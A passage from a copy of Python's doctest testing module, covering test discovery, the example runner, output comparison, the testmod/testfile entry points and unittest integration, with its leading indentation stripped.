# <= 2.3 that got lost by accident in 2.4. It was repaired in
# 2.4.4 and 2.5.
tests.sort()
return tests
def _filter(self, obj, prefix, base):
"""
Return true if the given object should not be examined.
"""
return (self._namefilter is not None and
self._namefilter(prefix, base))
def _from_module(self, module, object):
"""
Return true if the given object is defined in the given
module.
"""
if module is None:
return True
elif inspect.isfunction(object):
return module.__dict__ is object.__globals__
elif inspect.isclass(object):
# Some jython classes don't set __module__
return module.__name__ == getattr(object, '__module__', None)
elif inspect.getmodule(object) is not None:
return module is inspect.getmodule(object)
elif hasattr(object, '__module__'):
return module.__name__ == object.__module__
elif isinstance(object, property):
return True # [XX] no way not be sure.
else:
raise ValueError("object must be a class or function")
def _find(self, tests, obj, name, module, source_lines, globs, seen):
"""
Find tests for the given object and any contained objects, and
add them to `tests`.
"""
if self._verbose:
print('Finding tests in %s' % name)
# If we've already processed this object, then ignore it.
if id(obj) in seen:
return
seen[id(obj)] = 1
# Find a test for this object, and add it to the list of tests.
test = self._get_test(obj, name, module, globs, source_lines)
if test is not None:
tests.append(test)
# Look for tests in a module's contained objects.
if inspect.ismodule(obj) and self._recurse:
for valname, val in list(obj.__dict__.items()):
# Check if this contained object should be ignored.
if self._filter(val, name, valname):
continue
valname = '%s.%s' % (name, valname)
# Recurse to functions & classes.
if ((inspect.isfunction(val) or inspect.isclass(val)) and
self._from_module(module, val)):
self._find(tests, val, valname, module, source_lines,
globs, seen)
# Look for tests in a module's __test__ dictionary.
if inspect.ismodule(obj) and self._recurse:
for valname, val in list(getattr(obj, '__test__', {}).items()):
if not isinstance(valname, str):
raise ValueError("DocTestFinder.find: __test__ keys "
"must be strings: %r" %
(type(valname),))
if not (inspect.isfunction(val) or inspect.isclass(val) or
inspect.ismethod(val) or inspect.ismodule(val) or
isinstance(val, str)):
raise ValueError("DocTestFinder.find: __test__ values "
"must be strings, functions, methods, "
"classes, or modules: %r" %
(type(val),))
valname = '%s.__test__.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
# Look for tests in a class's contained objects.
if inspect.isclass(obj) and self._recurse:
for valname, val in list(obj.__dict__.items()):
# Check if this contained object should be ignored.
if self._filter(val, name, valname):
continue
# Special handling for staticmethod/classmethod.
if isinstance(val, staticmethod):
val = getattr(obj, valname)
if isinstance(val, classmethod):
val = getattr(obj, valname).__func__
# Recurse to methods, properties, and nested classes.
if ((inspect.isfunction(val) or inspect.isclass(val) or
isinstance(val, property)) and
self._from_module(module, val)):
valname = '%s.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
def _get_test(self, obj, name, module, globs, source_lines):
"""
Return a DocTest for the given object, if it defines a docstring;
otherwise, return None.
"""
# Extract the object's docstring. If it doesn't have one,
# then return None (no test for this object).
if isinstance(obj, str):
docstring = obj
else:
try:
if obj.__doc__ is None:
docstring = ''
else:
docstring = obj.__doc__
if not isinstance(docstring, str):
docstring = str(docstring)
except (TypeError, AttributeError):
docstring = ''
# Find the docstring's location in the file.
lineno = self._find_lineno(obj, source_lines)
# Don't bother if the docstring is empty.
if self._exclude_empty and not docstring:
return None
# Return a DocTest for this object.
if module is None:
filename = None
else:
filename = getattr(module, '__file__', module.__name__)
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
elif sys.platform.startswith('java') and \
filename.endswith('$py.class'):
filename = '%s.py' % filename[:-9]
return self._parser.get_doctest(docstring, globs, name,
filename, lineno)
def _find_lineno(self, obj, source_lines):
"""
Return a line number of the given object's docstring. Note:
this method assumes that the object has a docstring.
"""
lineno = None
# Find the line number for modules.
if inspect.ismodule(obj):
lineno = 0
# Find the line number for classes.
# Note: this could be fooled if a class is defined multiple
# times in a single file.
if inspect.isclass(obj):
if source_lines is None:
return None
pat = re.compile(r'^\s*class\s*%s\b' %
getattr(obj, '__name__', '-'))
for i, line in enumerate(source_lines):
if pat.match(line):
lineno = i
break
# Find the line number for functions & methods.
if inspect.ismethod(obj): obj = obj.__func__
if inspect.isfunction(obj): obj = obj.__code__
if inspect.istraceback(obj): obj = obj.tb_frame
if inspect.isframe(obj): obj = obj.f_code
if inspect.iscode(obj):
lineno = getattr(obj, 'co_firstlineno', None)-1
# Find the line number where the docstring starts. Assume
# that it's the first line that begins with a quote mark.
# Note: this could be fooled by a multiline function
# signature, where a continuation line begins with a quote
# mark.
if lineno is not None:
if source_lines is None:
return lineno+1
pat = re.compile('(^|.*:)\s*\w*("|\')')
for lineno in range(lineno, len(source_lines)):
if pat.match(source_lines[lineno]):
return lineno
# We couldn't find the line number.
return None
######################################################################
## 5. DocTest Runner
######################################################################
class DocTestRunner:
# This divider string is used to separate failure messages, and to
# separate sections of the summary.
DIVIDER = "*" * 70
def __init__(self, checker=None, verbose=None, optionflags=0):
"""
Create a new test runner.
Optional keyword arg `checker` is the `OutputChecker` that
should be used to compare the expected outputs and actual
outputs of doctest examples.
Optional keyword arg 'verbose' prints lots of stuff if true,
only failures if false; by default, it's true iff '-v' is in
sys.argv.
Optional argument `optionflags` can be used to control how the
test runner compares expected output to actual output, and how
it displays failures. See the documentation for `testmod` for
more information.
"""
self._checker = checker or OutputChecker()
if verbose is None:
verbose = '-v' in sys.argv
self._verbose = verbose
self.optionflags = optionflags
self.original_optionflags = optionflags
# Keep track of the examples we've run.
self.tries = 0
self.failures = 0
self._name2ft = {}
# Create a fake output target for capturing doctest output.
self._fakeout = _SpoofOut()
#/////////////////////////////////////////////////////////////////
# Reporting methods
#/////////////////////////////////////////////////////////////////
def report_start(self, out, test, example):
"""
Report that the test runner is about to process the given
example. (Only displays a message if verbose=True)
"""
if self._verbose:
if example.want:
out('Trying:\n' + _indent(example.source) +
'Expecting:\n' + _indent(example.want))
else:
out('Trying:\n' + _indent(example.source) +
'Expecting nothing\n')
def report_success(self, out, test, example, got):
"""
Report that the given example ran successfully. (Only
displays a message if verbose=True)
"""
if self._verbose:
out("ok\n")
def report_failure(self, out, test, example, got):
"""
Report that the given example failed.
"""
out(self._failure_header(test, example) +
self._checker.output_difference(example, got, self.optionflags))
def report_unexpected_exception(self, out, test, example, exc_info):
"""
Report that the given example raised an unexpected exception.
"""
out(self._failure_header(test, example) +
'Exception raised:\n' + _indent(_exception_traceback(exc_info)))
def _failure_header(self, test, example):
out = [self.DIVIDER]
if test.filename:
if test.lineno is not None and example.lineno is not None:
lineno = test.lineno + example.lineno + 1
else:
lineno = '?'
out.append('File "%s", line %s, in %s' %
(test.filename, lineno, test.name))
else:
out.append('Line %s, in %s' % (example.lineno+1, test.name))
out.append('Failed example:')
source = example.source
out.append(_indent(source))
return '\n'.join(out)
#/////////////////////////////////////////////////////////////////
# DocTest Running
#/////////////////////////////////////////////////////////////////
def __run(self, test, compileflags, out):
"""
Run the examples in `test`. Write the outcome of each example
with one of the `DocTestRunner.report_*` methods, using the
writer function `out`. `compileflags` is the set of compiler
flags that should be used to execute examples. Return a tuple
`(f, t)`, where `t` is the number of examples tried, and `f`
is the number of examples that failed. The examples are run
in the namespace `test.globs`.
"""
# Keep track of the number of failures and tries.
failures = tries = 0
# Save the option flags (since option directives can be used
# to modify them).
original_optionflags = self.optionflags
SUCCESS, FAILURE, BOOM = list(range(3)) # `outcome` state
check = self._checker.check_output
# Process each example.
for examplenum, example in enumerate(test.examples):
# If REPORT_ONLY_FIRST_FAILURE is set, then supress
# reporting after the first failure.
quiet = (self.optionflags & REPORT_ONLY_FIRST_FAILURE and
failures > 0)
# Merge in the example's options.
self.optionflags = original_optionflags
if example.options:
for (optionflag, val) in list(example.options.items()):
if val:
self.optionflags |= optionflag
else:
self.optionflags &= ~optionflag
# Record that we started this example.
tries += 1
if not quiet:
self.report_start(out, test, example)
# Use a special filename for compile(), so we can retrieve
# the source code during interactive debugging (see
# __patched_linecache_getlines).
filename = '<doctest %s[%d]>' % (test.name, examplenum)
# Run the example in the given context (globs), and record
# any exception that gets raised. (But don't intercept
# keyboard interrupts.)
try:
# Don't blink! This is where the user's code gets run.
exec(compile(example.source, filename, "single",
compileflags, 1), test.globs)
self.debugger.set_continue() # ==== Example Finished ====
exception = None
except KeyboardInterrupt:
raise
except:
exception = sys.exc_info()
self.debugger.set_continue() # ==== Example Finished ====
got = self._fakeout.getvalue() # the actual output
self._fakeout.truncate(0)
outcome = FAILURE # guilty until proved innocent or insane
# If the example executed without raising any exceptions,
# verify its output.
if exception is None:
if check(example.want, got, self.optionflags):
outcome = SUCCESS
# The example raised an exception: check if it was expected.
else:
exc_info = sys.exc_info()
exc_msg = traceback.format_exception_only(*exc_info[:2])[-1]
if not quiet:
got += _exception_traceback(exc_info)
# If `example.exc_msg` is None, then we weren't expecting
# an exception.
if example.exc_msg is None:
outcome = BOOM
# We expected an exception: see whether it matches.
elif check(example.exc_msg, exc_msg, self.optionflags):
outcome = SUCCESS
# Another chance if they didn't care about the detail.
elif self.optionflags & IGNORE_EXCEPTION_DETAIL:
m1 = re.match(r'[^:]*:', example.exc_msg)
m2 = re.match(r'[^:]*:', exc_msg)
if m1 and m2 and check(m1.group(0), m2.group(0),
self.optionflags):
outcome = SUCCESS
# Report the outcome.
if outcome is SUCCESS:
if not quiet:
self.report_success(out, test, example, got)
elif outcome is FAILURE:
if not quiet:
self.report_failure(out, test, example, got)
failures += 1
elif outcome is BOOM:
if not quiet:
self.report_unexpected_exception(out, test, example,
exc_info)
failures += 1
else:
assert False, ("unknown outcome", outcome)
# Restore the option flags (in case they were modified)
self.optionflags = original_optionflags
# Record and return the number of failures and tries.
self.__record_outcome(test, failures, tries)
return failures, tries
def __record_outcome(self, test, f, t):
"""
Record the fact that the given DocTest (`test`) generated `f`
failures out of `t` tried examples.
"""
f2, t2 = self._name2ft.get(test.name, (0,0))
self._name2ft[test.name] = (f+f2, t+t2)
self.failures += f
self.tries += t
__LINECACHE_FILENAME_RE = re.compile(r'<doctest '
r'(?P<name>[\w\.]+)'
r'\[(?P<examplenum>\d+)\]>$')
def __patched_linecache_getlines(self, filename):
m = self.__LINECACHE_FILENAME_RE.match(filename)
if m and m.group('name') == self.test.name:
example = self.test.examples[int(m.group('examplenum'))]
return example.source.splitlines(True)
else:
return self.save_linecache_getlines(filename)
def run(self, test, compileflags=None, out=None, clear_globs=True):
"""
Run the examples in `test`, and display the results using the
writer function `out`.
The examples are run in the namespace `test.globs`. If
`clear_globs` is true (the default), then this namespace will
be cleared after the test runs, to help with garbage
collection. If you would like to examine the namespace after
the test completes, then use `clear_globs=False`.
`compileflags` gives the set of flags that should be used by
the Python compiler when running the examples. If not
specified, then it will default to the set of future-import
flags that apply to `globs`.
The output of each example is checked using
`DocTestRunner.check_output`, and the results are formatted by
the `DocTestRunner.report_*` methods.
"""
self.test = test
if compileflags is None:
compileflags = _extract_future_flags(test.globs)
save_stdout = sys.stdout
if out is None:
out = save_stdout.write
sys.stdout = self._fakeout
# Patch pdb.set_trace to restore sys.stdout during interactive
# debugging (so it's not still redirected to self._fakeout).
# Note that the interactive output will go to *our*
# save_stdout, even if that's not the real sys.stdout; this
# allows us to write test cases for the set_trace behavior.
save_set_trace = pdb.set_trace
self.debugger = _OutputRedirectingPdb(save_stdout)
self.debugger.reset()
pdb.set_trace = self.debugger.set_trace
# Patch linecache.getlines, so we can see the example's source
# when we're inside the debugger.
self.save_linecache_getlines = linecache.getlines
linecache.getlines = self.__patched_linecache_getlines
try:
return self.__run(test, compileflags, out)
finally:
sys.stdout = save_stdout
pdb.set_trace = save_set_trace
linecache.getlines = self.save_linecache_getlines
if clear_globs:
test.globs.clear()
#/////////////////////////////////////////////////////////////////
# Summarization
#/////////////////////////////////////////////////////////////////
def summarize(self, verbose=None):
"""
Print a summary of all the test cases that have been run by
this DocTestRunner, and return a tuple `(f, t)`, where `f` is
the total number of failed examples, and `t` is the total
number of tried examples.
The optional `verbose` argument controls how detailed the
summary is. If the verbosity is not specified, then the
DocTestRunner's verbosity is used.
"""
if verbose is None:
verbose = self._verbose
notests = []
passed = []
failed = []
totalt = totalf = 0
for x in list(self._name2ft.items()):
name, (f, t) = x
assert f <= t
totalt += t
totalf += f
if t == 0:
notests.append(name)
elif f == 0:
passed.append( (name, t) )
else:
failed.append(x)
if verbose:
if notests:
print(len(notests), "items had no tests:")
notests.sort()
for thing in notests:
print(" ", thing)
if passed:
print(len(passed), "items passed all tests:")
passed.sort()
for thing, count in passed:
print(" %3d tests in %s" % (count, thing))
if failed:
print(self.DIVIDER)
print(len(failed), "items had failures:")
failed.sort()
for thing, (f, t) in failed:
print(" %3d of %3d in %s" % (f, t, thing))
if verbose:
print(totalt, "tests in", len(self._name2ft), "items.")
print(totalt - totalf, "passed and", totalf, "failed.")
if totalf:
print("***Test Failed***", totalf, "failures.")
elif verbose:
print("Test passed.")
return totalf, totalt
#/////////////////////////////////////////////////////////////////
# Backward compatibility cruft to maintain doctest.master.
#/////////////////////////////////////////////////////////////////
def merge(self, other):
d = self._name2ft
for name, (f, t) in list(other._name2ft.items()):
if name in d:
print("*** DocTestRunner.merge: '" + name + "' in both" \
" testers; summing outcomes.")
f2, t2 = d[name]
f = f + f2
t = t + t2
d[name] = f, t
class OutputChecker:
"""
A class used to check the whether the actual output from a doctest
example matches the expected output. `OutputChecker` defines two
methods: `check_output`, which compares a given pair of outputs,
and returns true if they match; and `output_difference`, which
returns a string describing the differences between two outputs.
"""
def check_output(self, want, got, optionflags):
"""
Return True iff the actual output from an example (`got`)
matches the expected output (`want`). These strings are
always considered to match if they are identical; but
depending on what option flags the test runner is using,
several non-exact match types are also possible. See the
documentation for `TestRunner` for more information about
option flags.
"""
# Handle the common case first, for efficiency:
# if they're string-identical, always return true.
if got == want:
return True
# The values True and False replaced 1 and 0 as the return
# value for boolean comparisons in Python 2.3.
if not (optionflags & DONT_ACCEPT_TRUE_FOR_1):
if (got,want) == ("True\n", "1\n"):
return True
if (got,want) == ("False\n", "0\n"):
return True
# <BLANKLINE> can be used as a special sequence to signify a
# blank line, unless the DONT_ACCEPT_BLANKLINE flag is used.
if not (optionflags & DONT_ACCEPT_BLANKLINE):
# Replace <BLANKLINE> in want with a blank line.
want = re.sub('(?m)^%s\s*?$' % re.escape(BLANKLINE_MARKER),
'', want)
# If a line in got contains only spaces, then remove the
# spaces.
got = re.sub('(?m)^\s*?$', '', got)
if got == want:
return True
# This flag causes doctest to ignore any differences in the
# contents of whitespace strings. Note that this can be used
# in conjunction with the ELLIPSIS flag.
if optionflags & NORMALIZE_WHITESPACE:
got = ' '.join(got.split())
want = ' '.join(want.split())
if got == want:
return True
# The ELLIPSIS flag says to let the sequence "..." in `want`
# match any substring in `got`.
if optionflags & ELLIPSIS:
if _ellipsis_match(want, got):
return True
# We didn't find any match; return false.
return False
# Should we do a fancy diff?
def _do_a_fancy_diff(self, want, got, optionflags):
# Not unless they asked for a fancy diff.
if not optionflags & (REPORT_UDIFF |
REPORT_CDIFF |
REPORT_NDIFF):
return False
# If expected output uses ellipsis, a meaningful fancy diff is
# too hard ... or maybe not. In two real-life failures Tim saw,
# a diff was a major help anyway, so this is commented out.
# [todo] _ellipsis_match() knows which pieces do and don't match,
# and could be the basis for a kick-ass diff in this case.
##if optionflags & ELLIPSIS and ELLIPSIS_MARKER in want:
## return False
# ndiff does intraline difference marking, so can be useful even
# for 1-line differences.
if optionflags & REPORT_NDIFF:
return True
# The other diff types need at least a few lines to be helpful.
return want.count('\n') > 2 and got.count('\n') > 2
def output_difference(self, example, got, optionflags):
"""
Return a string describing the differences between the
expected output for a given example (`example`) and the actual
output (`got`). `optionflags` is the set of option flags used
to compare `want` and `got`.
"""
want = example.want
# If <BLANKLINE>s are being used, then replace blank lines
# with <BLANKLINE> in the actual output string.
if not (optionflags & DONT_ACCEPT_BLANKLINE):
got = re.sub('(?m)^[ ]*(?=\n)', BLANKLINE_MARKER, got)
# Check if we should use diff.
if self._do_a_fancy_diff(want, got, optionflags):
# Split want & got into lines.
want_lines = want.splitlines(True) # True == keep line ends
got_lines = got.splitlines(True)
# Use difflib to find their differences.
if optionflags & REPORT_UDIFF:
diff = difflib.unified_diff(want_lines, got_lines, n=2)
diff = list(diff)[2:] # strip the diff header
kind = 'unified diff with -expected +actual'
elif optionflags & REPORT_CDIFF:
diff = difflib.context_diff(want_lines, got_lines, n=2)
diff = list(diff)[2:] # strip the diff header
kind = 'context diff with expected followed by actual'
elif optionflags & REPORT_NDIFF:
engine = difflib.Differ(charjunk=difflib.IS_CHARACTER_JUNK)
diff = list(engine.compare(want_lines, got_lines))
kind = 'ndiff with -expected +actual'
else:
assert 0, 'Bad diff option'
# Remove trailing whitespace on diff output.
diff = [line.rstrip() + '\n' for line in diff]
return 'Differences (%s):\n' % kind + _indent(''.join(diff))
# If we're not using diff, then simply list the expected
# output followed by the actual output.
if want and got:
return 'Expected:\n%sGot:\n%s' % (_indent(want), _indent(got))
elif want:
return 'Expected:\n%sGot nothing\n' % _indent(want)
elif got:
return 'Expected nothing\nGot:\n%s' % _indent(got)
else:
return 'Expected nothing\nGot nothing\n'
class DocTestFailure(Exception):
"""A DocTest example has failed in debugging mode.
The exception instance has variables:
- test: the DocTest object being run
- excample: the Example object that failed
- got: the actual output
"""
def __init__(self, test, example, got):
self.test = test
self.example = example
self.got = got
def __str__(self):
return str(self.test)
class UnexpectedException(Exception):
"""A DocTest example has encountered an unexpected exception
The exception instance has variables:
- test: the DocTest object being run
- excample: the Example object that failed
- exc_info: the exception info
"""
def __init__(self, test, example, exc_info):
self.test = test
self.example = example
self.exc_info = exc_info
def __str__(self):
return str(self.test)
class DebugRunner(DocTestRunner):
def run(self, test, compileflags=None, out=None, clear_globs=True):
r = DocTestRunner.run(self, test, compileflags, out, False)
if clear_globs:
test.globs.clear()
return r
def report_unexpected_exception(self, out, test, example, exc_info):
raise UnexpectedException(test, example, exc_info)
def report_failure(self, out, test, example, got):
raise DocTestFailure(test, example, got)
######################################################################
## 6. Test Functions
######################################################################
# These should be backwards compatible.
# For backward compatibility, a global instance of a DocTestRunner
# class, updated by testmod.
master = None
def testmod(m=None, name=None, globs=None, verbose=None, isprivate=None,
report=True, optionflags=0, extraglobs=None,
raise_on_error=False, exclude_empty=False):
"""m=None, name=None, globs=None, verbose=None, isprivate=None,
report=True, optionflags=0, extraglobs=None, raise_on_error=False,
exclude_empty=False
Test examples in docstrings in functions and classes reachable
from module m (or the current module if m is not supplied), starting
with m.__doc__. Unless isprivate is specified, private names
are not skipped.
Also test examples reachable from dict m.__test__ if it exists and is
not None. m.__test__ maps names to functions, classes and strings;
function and class docstrings are tested even if the name is private;
strings are tested directly, as if they were docstrings.
Return (#failures, #tests).
See doctest.__doc__ for an overview.
Optional keyword arg "name" gives the name of the module; by default
use m.__name__.
Optional keyword arg "globs" gives a dict to be used as the globals
when executing examples; by default, use m.__dict__. A copy of this
dict is actually used for each docstring, so that each docstring's
examples start with a clean slate.
Optional keyword arg "extraglobs" gives a dictionary that should be
merged into the globals that are used to execute examples. By
default, no extra globals are used. This is new in 2.4.
Optional keyword arg "verbose" prints lots of stuff if true, prints
only failures if false; by default, it's true iff "-v" is in sys.argv.
Optional keyword arg "report" prints a summary at the end when true,
else prints nothing at the end. In verbose mode, the summary is
detailed, else very brief (in fact, empty if all tests passed).
Optional keyword arg "optionflags" or's together module constants,
and defaults to 0. This is new in 2.3. Possible values (see the
docs for details):
DONT_ACCEPT_TRUE_FOR_1
DONT_ACCEPT_BLANKLINE
NORMALIZE_WHITESPACE
ELLIPSIS
IGNORE_EXCEPTION_DETAIL
REPORT_UDIFF
REPORT_CDIFF
REPORT_NDIFF
REPORT_ONLY_FIRST_FAILURE
Optional keyword arg "raise_on_error" raises an exception on the
first unexpected exception or failure. This allows failures to be
post-mortem debugged.
Deprecated in Python 2.4:
Optional keyword arg "isprivate" specifies a function used to
determine whether a name is private. The default function is
treat all functions as public. Optionally, "isprivate" can be
set to doctest.is_private to skip over functions marked as private
using the underscore naming convention; see its docs for details.
Advanced tomfoolery: testmod runs methods of a local instance of
class doctest.Tester, then merges the results into (or creates)
global Tester instance doctest.master. Methods of doctest.master
can be called directly too, if you want to do something unusual.
Passing report=0 to testmod is especially useful then, to delay
displaying a summary. Invoke doctest.master.summarize(verbose)
when you're done fiddling.
"""
global master
if isprivate is not None:
warnings.warn("the isprivate argument is deprecated; "
"examine DocTestFinder.find() lists instead",
DeprecationWarning)
# If no module was given, then use __main__.
if m is None:
# DWA - m will still be None if this wasn't invoked from the command
# line, in which case the following TypeError is about as good an error
# as we should expect
m = sys.modules.get('__main__')
# Check that we were actually given a module.
if not inspect.ismodule(m):
raise TypeError("testmod: module required; %r" % (m,))
# If no name was given, then use the module's name.
if name is None:
name = m.__name__
# Find, parse, and run all tests in the given module.
finder = DocTestFinder(_namefilter=isprivate, exclude_empty=exclude_empty)
if raise_on_error:
runner = DebugRunner(verbose=verbose, optionflags=optionflags)
else:
runner = DocTestRunner(verbose=verbose, optionflags=optionflags)
for test in finder.find(m, name, globs=globs, extraglobs=extraglobs):
runner.run(test)
if report:
runner.summarize()
if master is None:
master = runner
else:
master.merge(runner)
return runner.failures, runner.tries
def testfile(filename, module_relative=True, name=None, package=None,
globs=None, verbose=None, report=True, optionflags=0,
extraglobs=None, raise_on_error=False, parser=DocTestParser()):
"""
Test examples in the given file. Return (#failures, #tests).
Optional keyword arg "module_relative" specifies how filenames
should be interpreted:
- If "module_relative" is True (the default), then "filename"
specifies a module-relative path. By default, this path is
relative to the calling module's directory; but if the
"package" argument is specified, then it is relative to that
package. To ensure os-independence, "filename" should use
"/" characters to separate path segments, and should not
be an absolute path (i.e., it may not begin with "/").
- If "module_relative" is False, then "filename" specifies an
os-specific path. The path may be absolute or relative (to
the current working directory).
Optional keyword arg "name" gives the name of the test; by default
use the file's basename.
Optional keyword argument "package" is a Python package or the
name of a Python package whose directory should be used as the
base directory for a module relative filename. If no package is
specified, then the calling module's directory is used as the base
directory for module relative filenames. It is an error to
specify "package" if "module_relative" is False.
Optional keyword arg "globs" gives a dict to be used as the globals
when executing examples; by default, use {}. A copy of this dict
is actually used for each docstring, so that each docstring's
examples start with a clean slate.
Optional keyword arg "extraglobs" gives a dictionary that should be
merged into the globals that are used to execute examples. By
default, no extra globals are used.
Optional keyword arg "verbose" prints lots of stuff if true, prints
only failures if false; by default, it's true iff "-v" is in sys.argv.
Optional keyword arg "report" prints a summary at the end when true,
else prints nothing at the end. In verbose mode, the summary is
detailed, else very brief (in fact, empty if all tests passed).
Optional keyword arg "optionflags" or's together module constants,
and defaults to 0. Possible values (see the docs for details):
DONT_ACCEPT_TRUE_FOR_1
DONT_ACCEPT_BLANKLINE
NORMALIZE_WHITESPACE
ELLIPSIS
IGNORE_EXCEPTION_DETAIL
REPORT_UDIFF
REPORT_CDIFF
REPORT_NDIFF
REPORT_ONLY_FIRST_FAILURE
Optional keyword arg "raise_on_error" raises an exception on the
first unexpected exception or failure. This allows failures to be
post-mortem debugged.
Optional keyword arg "parser" specifies a DocTestParser (or
subclass) that should be used to extract tests from the files.
Advanced tomfoolery: testmod runs methods of a local instance of
class doctest.Tester, then merges the results into (or creates)
global Tester instance doctest.master. Methods of doctest.master
can be called directly too, if you want to do something unusual.
Passing report=0 to testmod is especially useful then, to delay
displaying a summary. Invoke doctest.master.summarize(verbose)
when you're done fiddling.
"""
global master
if package and not module_relative:
raise ValueError("Package may only be specified for module-"
"relative paths.")
# Relativize the path
if module_relative:
package = _normalize_module(package)
filename = _module_relative_path(package, filename)
# If no name was given, then use the file's name.
if name is None:
name = os.path.basename(filename)
# Assemble the globals.
if globs is None:
globs = {}
else:
globs = globs.copy()
if extraglobs is not None:
globs.update(extraglobs)
if raise_on_error:
runner = DebugRunner(verbose=verbose, optionflags=optionflags)
else:
runner = DocTestRunner(verbose=verbose, optionflags=optionflags)
# Read the file, convert it to a test, and run it.
s = open(filename).read()
test = parser.get_doctest(s, globs, name, filename, 0)
runner.run(test)
if report:
runner.summarize()
if master is None:
master = runner
else:
master.merge(runner)
return runner.failures, runner.tries
def run_docstring_examples(f, globs, verbose=False, name="NoName",
compileflags=None, optionflags=0):
"""
Test examples in the given object's docstring (`f`), using `globs`
as globals. Optional argument `name` is used in failure messages.
If the optional argument `verbose` is true, then generate output
even if there are no failures.
`compileflags` gives the set of flags that should be used by the
Python compiler when running the examples. If not specified, then
it will default to the set of future-import flags that apply to
`globs`.
Optional keyword arg `optionflags` specifies options for the
testing and output. See the documentation for `testmod` for more
information.
"""
# Find, parse, and run all tests in the given module.
finder = DocTestFinder(verbose=verbose, recurse=False)
runner = DocTestRunner(verbose=verbose, optionflags=optionflags)
for test in finder.find(f, name, globs=globs):
runner.run(test, compileflags=compileflags)
######################################################################
## 7. Tester
######################################################################
# This is provided only for backwards compatibility. It's not
# actually used in any way.
class Tester:
def __init__(self, mod=None, globs=None, verbose=None,
isprivate=None, optionflags=0):
warnings.warn("class Tester is deprecated; "
"use class doctest.DocTestRunner instead",
DeprecationWarning, stacklevel=2)
if mod is None and globs is None:
raise TypeError("Tester.__init__: must specify mod or globs")
if mod is not None and not inspect.ismodule(mod):
raise TypeError("Tester.__init__: mod must be a module; %r" %
(mod,))
if globs is None:
globs = mod.__dict__
self.globs = globs
self.verbose = verbose
self.isprivate = isprivate
self.optionflags = optionflags
self.testfinder = DocTestFinder(_namefilter=isprivate)
self.testrunner = DocTestRunner(verbose=verbose,
optionflags=optionflags)
def runstring(self, s, name):
test = DocTestParser().get_doctest(s, self.globs, name, None, None)
if self.verbose:
print("Running string", name)
(f,t) = self.testrunner.run(test)
if self.verbose:
print(f, "of", t, "examples failed in string", name)
return (f,t)
def rundoc(self, object, name=None, module=None):
f = t = 0
tests = self.testfinder.find(object, name, module=module,
globs=self.globs)
for test in tests:
(f2, t2) = self.testrunner.run(test)
(f,t) = (f+f2, t+t2)
return (f,t)
def rundict(self, d, name, module=None):
import new
m = new.module(name)
m.__dict__.update(d)
if module is None:
module = False
return self.rundoc(m, name, module)
def run__test__(self, d, name):
import new
m = new.module(name)
m.__test__ = d
return self.rundoc(m, name)
def summarize(self, verbose=None):
return self.testrunner.summarize(verbose)
def merge(self, other):
self.testrunner.merge(other.testrunner)
######################################################################
## 8. Unittest Support
######################################################################
_unittest_reportflags = 0
def set_unittest_reportflags(flags):
global _unittest_reportflags
if (flags & REPORTING_FLAGS) != flags:
raise ValueError("Only reporting flags allowed", flags)
old = _unittest_reportflags
_unittest_reportflags = flags
return old
class DocTestCase(unittest.TestCase):
def __init__(self, test, optionflags=0, setUp=None, tearDown=None,
checker=None):
unittest.TestCase.__init__(self)
self._dt_optionflags = optionflags
self._dt_checker = checker
self._dt_test = test
self._dt_setUp = setUp
self._dt_tearDown = tearDown
def setUp(self):
test = self._dt_test
if self._dt_setUp is not None:
self._dt_setUp(test)
def tearDown(self):
test = self._dt_test
if self._dt_tearDown is not None:
self._dt_tearDown(test)
test.globs.clear()
def runTest(self):
test = self._dt_test
old = sys.stdout
new = StringIO()
optionflags = self._dt_optionflags
if not (optionflags & REPORTING_FLAGS):
# The option flags don't include any reporting flags,
# so add the default reporting flags
optionflags |= _unittest_reportflags
runner = DocTestRunner(optionflags=optionflags,
checker=self._dt_checker, verbose=False)
try:
runner.DIVIDER = "-"*70
failures, tries = runner.run(
test, out=new.write, clear_globs=False)
finally:
sys.stdout = old
if failures:
raise self.failureException(self.format_failure(new.getvalue()))
def format_failure(self, err):
test = self._dt_test
if test.lineno is None:
lineno = 'unknown line number'
else:
lineno = '%s' % test.lineno
lname = '.'.join(test.name.split('.')[-1:])
return ('Failed doctest test for %s\n'
' File "%s", line %s, in %s\n\n%s'
% (test.name, test.filename, lineno, lname, err)
)
def debug(self):
self.setUp()
runner = DebugRunner(optionflags=self._dt_optionflags,
checker=self._dt_checker, verbose=False)
runner.run(self._dt_test)
self.tearDown()
def id(self):
return self._dt_test.name
def __repr__(self):
name = self._dt_test.name.split('.')
return "%s (%s)" % (name[-1], '.'.join(name[:-1]))
__str__ = __repr__
def shortDescription(self):
return "Doctest: " + self._dt_test.name
def DocTestSuite(module=None, globs=None, extraglobs=None, test_finder=None,
**options):
"""
Convert doctest tests for a module to a unittest test suite.
This converts each documentation string in a module that
contains doctest tests to a unittest test case. If any of the
tests in a doc string fail, then the test case fails. An exception
is raised showing the name of the file containing the test and a
(sometimes approximate) line number.
The `module` argument provides the module to be tested. The argument
can be either a module or a module name.
If no argument is given, the calling module is used.
A number of options may be provided as keyword arguments:
setUp
A set-up function. This is called before running the
tests in each file. The setUp function will be passed a DocTest
object. The setUp function can access the test globals as the
globs attribute of the test passed.
tearDown
A tear-down function. This is called after running the
tests in each file. The tearDown function will be passed a DocTest
object. The tearDown function can access the test globals as the
globs attribute of the test passed.
globs
A dictionary containing initial global variables for the tests.
optionflags
A set of doctest option flags expressed as an integer.
"""
if test_finder is None:
test_finder = DocTestFinder()
module = _normalize_module(module)
tests = test_finder.find(module, globs=globs, extraglobs=extraglobs)
if globs is None:
globs = module.__dict__
if not tests:
# Why do we want to do this? Because it reveals a bug that might
# otherwise be hidden.
raise ValueError(module, "has no tests")
tests.sort()
suite = unittest.TestSuite()
for test in tests:
if len(test.examples) == 0:
continue
if not test.filename:
filename = module.__file__
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
elif sys.platform.startswith('java') and \
filename.endswith('$py.class'):
filename = '%s.py' % filename[:-9]
test.filename = filename
suite.addTest(DocTestCase(test, **options))
return suite
class DocFileCase(DocTestCase):
def id(self):
return '_'.join(self._dt_test.name.split('.'))
def __repr__(self):
return self._dt_test.filename
__str__ = __repr__
def format_failure(self, err):
return ('Failed doctest test for %s\n File "%s", line 0\n\n%s'
% (self._dt_test.name, self._dt_test.filename, err)
)
def DocFileTest(path, module_relative=True, package=None,
globs=None, parser=DocTestParser(), **options):
if globs is None:
globs = {}
